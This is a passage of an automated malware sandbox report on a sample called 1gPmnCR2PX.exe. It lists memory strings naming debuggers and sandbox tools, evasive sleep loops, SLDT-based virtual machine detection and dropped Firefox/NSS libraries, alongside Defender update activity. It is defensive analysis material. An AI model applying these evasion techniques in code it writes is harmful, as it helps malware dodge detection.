EG.EXE|REGASM.EXE|REGDELNULL.EXE|REGDELNULL64.EXE|REGEDIT.EXE|REGISTER-CIMPROVIDER|REGJUMP.EXE|REGSVCS.EXE|REGSVR32.EXE|REPLACE.EXE|ROBOCOPY.EXE|ROCCAT_SWARM.EXE|RPCPING.EXE|RUNDLL32.EXE|RUNONCE.EXE|RUNSCRIPTHELPER.EXE|RUNTIMEBROKER.EXE|SC.EXE|SCRIPTRUNNER.EXE|SDELETE.EXE|SDELETE64.EXE|SDIAGNHOST.EXE|SEARCHFILTERHOST.EXE|SEARCHINDEXER.EXE|SEARCHPROTOCOLHOST.EXE|SECURITYHEALTHSERVICE.EXE|SERVICES.EXE|SETTINGSYNCHOST.EXE|SGRMBROKER.EXE|SIGCHECK.EXE|SIGCHECK64.EXE|SIHOST.EXE|SMARTSCREEN.EXE|SMSS.EXE|SPLWOW64.EXE|SPOOLSV.EXE|SPPSVC.EXE|SQLDUMPER.EXE|SQLPS.EXE|SQLTOOLSPS.EXE|STREAMS.EXE|STREAMS64.EXE|SURFACECOLORSERVICE.EXE|SURFACESERVICE.EXE|SVCHOST.EXE|SYNCAPPVPUBLISHINGSERVER.EXE|SYNCHOST.EXE|SYSMON.EXE|SYSMON64.EXE|SYSTEMSETTINGSBROKER.EXE|TASKHOSTW.EXE|TASKMGR.EXE|TCPVCON.EXE|TCPVIEW.EXE|TE.EXE|TRACKER.EXE|USBINST.EXE|VBOXDRVINST.EXE|VMCOMPUTE.EXE|VMMAP.EXE|VMMS.EXE|VSJITD
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp Binary or memory string: PEBROWSEDBG.EXE
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXE
Source: MpSigStub.exe, 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18267435419.0000021B5E8B8000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXE
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp Binary or memory string: $Y!#SLF:AGGR:MASQUERADE_AS!PROCMON.EXE
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLA
Source: MpSigStub.exe, 0000000B.00000003.18267435419.0000021B5E8B8000.00000004.00000001.sdmp Binary or memory string: DIR_WATCH.DLL
Source: 1gPmnCR2PX.exe, 00000006.00000002.18689952174.00000000022D0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp Binary or memory string: *.LOG.|!\FABRICOBSERVER.EXE
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp Binary or memory string: #I!#BM_COPYRENAMEDONAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp Binary or memory string: SANDBOXIERPCSS.EXE
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: "G!#BM_COPYRENAMEDINAME_AUTORUNS.EXE
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !E!#BM_COPYRENAMEDINAME_PROCMON.EXE
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE
Source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp Binary or memory string: #I!#BM_COPYRENAMEDINAME_AUTORUNSC.EXE
Source: 1gPmnCR2PX.exe, 00000006.00000002.18689952174.00000000022D0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp Binary or memory string: RC:\PROGRAM FILES\WIRESHARK\WIRESHARK.EXE
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXE
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp Binary or memory string: FAKEHTTPSERVER.EXE
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: MpSigStub.exe, 0000000B.00000003.18267435419.0000021B5E8B8000.00000004.00000001.sdmp Binary or memory string: SNIFF_HIT.EXE
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp Binary or memory string: BSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\WIRESHARK.EXE
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe TID: 3176 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe TID: 8184 Thread sleep count: 84 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ConfigSecurityPolicy.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpAsDesc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSvc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpAzSubmit.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\prldap60.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\endpointdlp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpDetoursCopyAccelerator.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\mpextms.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\NisSrv.exe Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\MapiProxy_InUse.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\endpointdlp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\DefenderCSP.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpavdlta.vdm Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\nssckbi.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\qipcap.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpEvMsg.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\mozMapi32_InUse.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpOAV.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpDlpCmd.exe Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpAsDesc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpUxAgent.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\nssdbm3.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpDetours.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\AccessibleMarshal.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpavbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\Drivers\WdBoot.sys Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpOAV.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpasdlta.vdm Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ProtectionManagement.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\ldap60.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\MapiProxy.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpDetours.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpasbase.vdm Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpCmdRun.exe Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\AccessibleHandler.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\breakpadinjector.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpCommu.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MsMpEng.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\Drivers\WdNisDrv.sys Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\mozMapi32.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\IA2Marshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\lgpllibs.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\libEGL.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\Drivers\WdFilter.sys Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\ldif60.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpRtp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\Drivers\WdDevFlt.sys Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpUpdate.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpDetoursCopyAccelerator.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Contains functionality to detect virtual machines (SLDT)
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 22_3_0077A7DC sldt word ptr [eax] 22_3_0077A7DC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\ Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\ Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpavdlta.vdm Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\ Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\1.349.0.0_to_1.351.0.0_mpavbase.vdm._p Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File opened: C:\Windows\SERVIC~1\ Jump to behavior
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: &!*.rom.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 0000000B.00000003.18242140294.0000021B4FF6A000.00000004.00000001.sdmp Binary or memory string: detects_vmware
Source: MpSigStub.exe, 0000000B.00000003.18288234177.0000021B5E77E000.00000004.00000001.sdmp Binary or memory string: C:\WINDOWS\SYSTEM32\VMBUSRES.DLL>C:\WINDOWS\SYSTEM32\UNKNOWNDLL.DLL
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.AVHDX.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.BIN.|%systemroot%\System32\Vmwp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.toc.|!\qemu-system-armel.exe
